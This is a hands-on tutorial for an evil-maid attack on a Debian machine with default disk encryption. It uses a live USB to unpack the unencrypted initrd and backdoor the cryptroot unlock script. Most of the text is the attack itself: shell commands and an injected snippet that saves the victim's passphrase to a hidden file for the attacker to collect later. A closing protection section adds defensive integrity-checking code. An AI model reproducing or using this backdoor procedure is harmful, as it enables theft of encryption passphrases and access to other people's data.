Bypass Disk Encryption Linux

We are going to learn how to steal the passphrase of a drive encrypted with the default setup of a Debian distribution.

How? Through physical intrusion!

The general idea is simple. By default, disk encryption on Debian (and many other distributions) does not encrypt the /boot directory, even though full disk encryption (including /boot) is available via GRUB2.

To perform this attack, we are going to use a live USB on the target machine. Using the live USB, we modify the script that asks for the passphrase (located in /boot) so that it writes the passphrase typed by the victim to a text file. The next time the victim decrypts the disk, the passphrase is written in plain text on a partition accessible to the attacker.

Requirements

  • debian-live on a USB key
  • The ability to boot the target machine from the live USB
  • Two physical accesses to the target machine (one to deploy the backdoor, one to retrieve the plaintext passphrase)

For this example:

Victim: a Debian stretch machine named “vict” with a disk encrypted using the default setup of the Debian installer. This means the /boot partition is unencrypted.

Attacker: a debian-live named “hack” on a USB key.

⚠️ In this example initrd.img will be initrd.img-3.16.0-6-amd64. The 3.16.0-6-amd64 part of the file name is specific to the kernel version. ⚠️

Exploitation

  1. The attacker inserts the USB key “hack” into the “vict” machine.
  2. The attacker boots “vict” from the debian-live “hack”.

If you want an AZERTY keyboard layout:

$ setxkbmap fr

Switch to root #HackTheWorld

$ sudo -s

Mount the unencrypted /boot partition of “vict” on the /mnt directory of “hack”:

$ mount /dev/sda1 /mnt

Friendly reminder, “vict” is a Debian system.

Go into /mnt and check that the content looks like a /boot partition (files and directories such as vmlinuz, initrd, grub).

Create a work directory at the file system root.

$ mkdir /work

We are working outside the /boot partition because its space is very limited (236 MB).

Copy the file whose name begins with initrd.img- (on Arch it is initramfs-linux.img) into the work directory. Make sure to remember the original name of the file you are copying.

$ cp /mnt/initrd.img-3.16.0-6-amd64 /work/

The initrd.img-3.16.0-6-amd64 file is a gzip archive. To be able to decompress it, rename it by adding the .gz extension:

$ cd /work && mv initrd.img-3.16.0-6-amd64 initrd.img-3.16.0-6-amd64.gz

Decompress it:

$ gzip -d initrd.img-3.16.0-6-amd64.gz

You will get a file named initrd.img-3.16.0-6-amd64. This file is a CPIO archive. Extract it:

$ cpio -i < initrd.img-3.16.0-6-amd64

Now you have a minimal file system.

But why? What is this initrd file?

Initrd stands for Initial RAM Disk. It is the file that is loaded into RAM at system boot. It gives the OS a minimal file system with the essential binaries that allow it to load the main file system.

We need to find the decryption script. To find it, grep for a piece of the message displayed when you have to unlock the disk:

$ rgrep "Please unlock disk"

You may get multiple files in the results. If that is the case, it is up to you to identify the right one. Here, the right one is scripts/local-top/cryptroot.

Open scripts/local-top/cryptroot. Search for the pattern “cryptsetup failed, bad password or option?”. Find the beginning of the while loop containing the “cryptsetup failed” message:

while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do

Right before the while loop, insert:

##HACK BEGIN
zer=$($cryptkeyscript "$cryptkey")
mkdir oklm
mount -t ext2 -o rw /dev/sda1 oklm
echo $zer >> oklm/.kernel_option.tmp
umount oklm
##HACK END

This code writes the passphrase submitted by the victim to .kernel_option.tmp on the /boot partition of “vict”.

Delete the CPIO initrd file extracted earlier from the /work directory (otherwise it would be packed into the new archive). Then create a new CPIO initrd file containing the modified script:

$ find . | cpio -H newc -o > ../initrd.img-3.16.0-6-amd64

Make sure that, in the above command, you use the original initrd filename.

The new CPIO file is created outside the work directory.

Compress the new CPIO file with gzip:

$ gzip ../initrd.img-3.16.0-6-amd64

Move the new initrd.img-3.16.0-6-amd64.gz file into /mnt (the /boot partition of “vict”) and remove the .gz extension from the file name:

$ mv ../initrd.img-*.gz /mnt/initrd.img-3.16.0-6-amd64

Make sure to remove the extension so that the original initrd file is replaced by the backdoored one.

Unmount /boot, which is mounted on /mnt:

$ cd && umount /mnt

Shut down the machine.

Post Exploitation

Wait until the victim has unlocked their disk at least once, then insert the USB key “hack” into the victim’s machine. Boot from “hack” and:

$ mount /dev/sda1 /mnt

Check out the stolen passphrase in /mnt/.kernel_option.tmp:

$ cat /mnt/.kernel_option.tmp

Tadam! You have successfully stolen a passphrase.

Protection

To protect yourself against this attack:

  1. Set a BIOS password.
  2. Disable booting from USB keys, CDs, the network or any other external device.
  3. Encrypt your /boot with GRUB2. There are many tutorials online on how to do it, but I recommend this one.
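The three measures above prevent the attack; a defender can also detect it after the fact, since it leaves a modified initrd and a new file behind on the unencrypted /boot partition. The following shell script is an added example, not part of the original article: it records a SHA-256 manifest of a /boot partition from a trusted state and later verifies that no file was modified, removed or added. The mount point /mnt, the manifest path and the constructed test files are assumptions made for this example.

```shell
#!/bin/sh
# Added example: integrity manifest for an unencrypted /boot partition.
# Assumes GNU coreutils (sha256sum, comm, cut, mktemp) and find are present.
# Usage (from a trusted environment, e.g. a live system with the /boot
# partition mounted on /mnt, both paths being placeholders):
#   boot_manifest_create /mnt /path/on/encrypted/root/boot.sha256
# and on every later check:
#   boot_manifest_verify /mnt /path/on/encrypted/root/boot.sha256

# Write "hash  ./relative/path" for every regular file under $1 into the
# manifest $2, sorted so the manifest is stable and compatible with
# "sha256sum -c".
boot_manifest_create() {
    dir=$1
    manifest=$2
    ( cd "$dir" && find . -type f | LC_ALL=C sort | while IFS= read -r f; do
        sha256sum "$f"
    done ) > "$manifest"
}

# Compare the tree under $1 with the manifest $2.
# Returns 0 when every listed file is unchanged and nothing new appeared,
# 1 otherwise (sha256sum names modified/missing files, we name added ones).
boot_manifest_verify() {
    dir=$1
    manifest=$2
    status=0

    # 1. Known files: a swapped initrd shows up here as FAILED.
    if ! ( cd "$dir" && sha256sum --quiet -c "$manifest" ); then
        status=1
    fi

    # 2. New files: a dropped passphrase file shows up here as ADDED.
    # The path starts at column 67 of each manifest line (64 hex chars + 2 spaces).
    listed=$(mktemp)
    current=$(mktemp)
    cut -c67- "$manifest" | LC_ALL=C sort > "$listed"
    ( cd "$dir" && find . -type f ) | LC_ALL=C sort > "$current"
    added=$(LC_ALL=C comm -13 "$listed" "$current")
    if [ -n "$added" ]; then
        printf 'ADDED (not in manifest):\n%s\n' "$added"
        status=1
    fi
    rm -f "$listed" "$current"
    return $status
}

# Command-line dispatch; does nothing when the file is only sourced.
case "${1-}" in
    create) boot_manifest_create "$2" "$3" ;;
    verify) boot_manifest_verify "$2" "$3" ;;
esac
```

Store the manifest on the encrypted root file system or off the machine, never on /boot itself, since anyone who can rewrite the initrd can rewrite a manifest that sits next to it. Regenerate it after every legitimate kernel or initramfs update, and treat any FAILED or ADDED line between updates as a sign that the passphrase should be considered compromised and changed.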

Automated tools

Automated versions of this attack exist; one of them is the “Evil Abigail” tool. You can find it here.